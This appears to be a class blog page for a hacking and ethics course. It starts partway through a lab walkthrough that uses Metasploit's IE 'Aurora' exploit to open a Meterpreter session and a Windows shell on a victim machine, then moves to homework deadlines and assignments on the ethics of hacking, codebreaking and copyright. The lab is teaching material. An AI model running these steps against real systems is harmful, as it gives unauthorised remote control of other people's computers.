[*] Sending Internet Explorer “Aurora” Memory Corruption to client Windows_Victim_IP_Address
[*] Sending stage (749056 bytes) to Windows_Victim_IP_Address
[*] Meterpreter session 1 opened (BackTrack_IP_Address:4444 -> Windows_Victim_IP_Address:Port #) at Day, Date Time
Note: you need to hit ENTER to get your Metasploit shell back

13. Type the following (only type what’s in bold):
msf exploit (ms10_002_aurora) > sessions -i x (where x is the Channel number in the output in step #12)
[*] Starting interaction with 1…
meterpreter >

14. Open a Windows command shell through the Meterpreter shell

Chapters 11, 12, 13 Homework

Chapter 11 - Activities 11.1 - 11.3
Chapter 12 - Activities 12.2, 12.4, 12.5
Chapter 13 -  Activities 13.1 - 13.3

Screen shots for these are due next Thursday, December 8.




A story about frequency recognition code breaking

The Gold Bug, by Edgar Allan Poe

Final ethics blog post! (Due 12/15)

Please create a NEW POST on the blog of 700-800 words *PRECISELY*. Not longer, not shorter. Make it engaging, analytically sophisticated, and concise.



In your post, you will apply the skills of ethical analysis you've learned to create a piece of writing that contributes to the internet discourse on the ethics of hacking. You are writing for a real audience, and you are contributing to a 21st century debate that is dearly in need of attention from smart peoples who are skilled in thinking about both hacking and philosophy.



Choose one of the episodes by Michael Sandel on http://www.justiceharvard.org/watch/ I don't recommend the first or last ones; any of the others could work well.



Watch the lecture. :)



Think about the lecture. Generally, Sandel will introduce a political or moral philosopher, like Aristotle, Kant, Rawls, or Locke, and apply the philosopher's ideas to situations.



Those situations will generally not have anything to do with computers. This is a shortcoming in our 21st century world.



You can ameliorate this problem. Apply the ideas in the lecture of your choice--ideas like utilitarianism, rights, moral desert, loyalty, etc.--to a problem or case of your choice in computer hacking. What would John Stuart Mill say about wardriving? What would John Rawls say about jailbreaking? What would John Locke say about replacing the characters in a URL and seeing what you get? What would Immanuel Kant (look, he's not named John!) say about doing that thing where you use web forms to SQLeeze your way into databases?



Don't forget to briefly introduce your philosopher and your hacking idea before you connect them. Readers will happen upon your post via Google, so you want to give them a bit of an introduction so they're not flying blind.



Make sure your ideas are analytically sophisticated--that would go without saying. But ideas are only part of the battle. Don't forget to express your ideas in an attractive and engaging and concise way. Wit, humor, beautiful writing--all these are great ways to engage your readers. Think about your favorite serious bloggers or op-ed--that's the sort of tone you want.

Codebreaking

Find out about codemaking, codebreaking.

Cryptography.

Frequency analysis.

Cipher texts.

Caesarean shifts.

Enigma.

These are words that matter for codebreaking.


Copywrong?

Y'all are hacker-types.

And while hacker-types and pirate-types are definitely not coterminous categories, piracy and hacking are closely connected. The Observant Commuter drew our attention to this several posts back.

Which brings us to the question of copyright.

Books, music, movies, software, drugs--all these can be and are copyrighted.

Does copyright undermine or increase creativity? Does pirated software infringe on property rights? And if so, how so? Does the blame lie with the person who uploaded a file to a torrent site, the person who downloads and benefits from it, or both--and why? Is copyright defensible in theory, but is the 21st century way of doing copyright a step too far? What do you think? Please create a comment on this post, no later than 12/6 at 1:00 PM (AKA Captain Seafoam Green's breakfast hour).


Some things to think with:


A theoretically-sophisticated argument that copyright is not justifiable in its current form:


http://www.tomgpalmer.com/wp-content/uploads/papers/morallyjustified.pdf


Two simpler perspectives on intellectual property:


http://www.stephankinsella.com/wp-content/uploads/publications/InsightMag_com_symp_printable.htm


About piratebay


http://en.wikipedia.org/wiki/The_Pirate_Bay








A movie (one hour long)





Steal This Film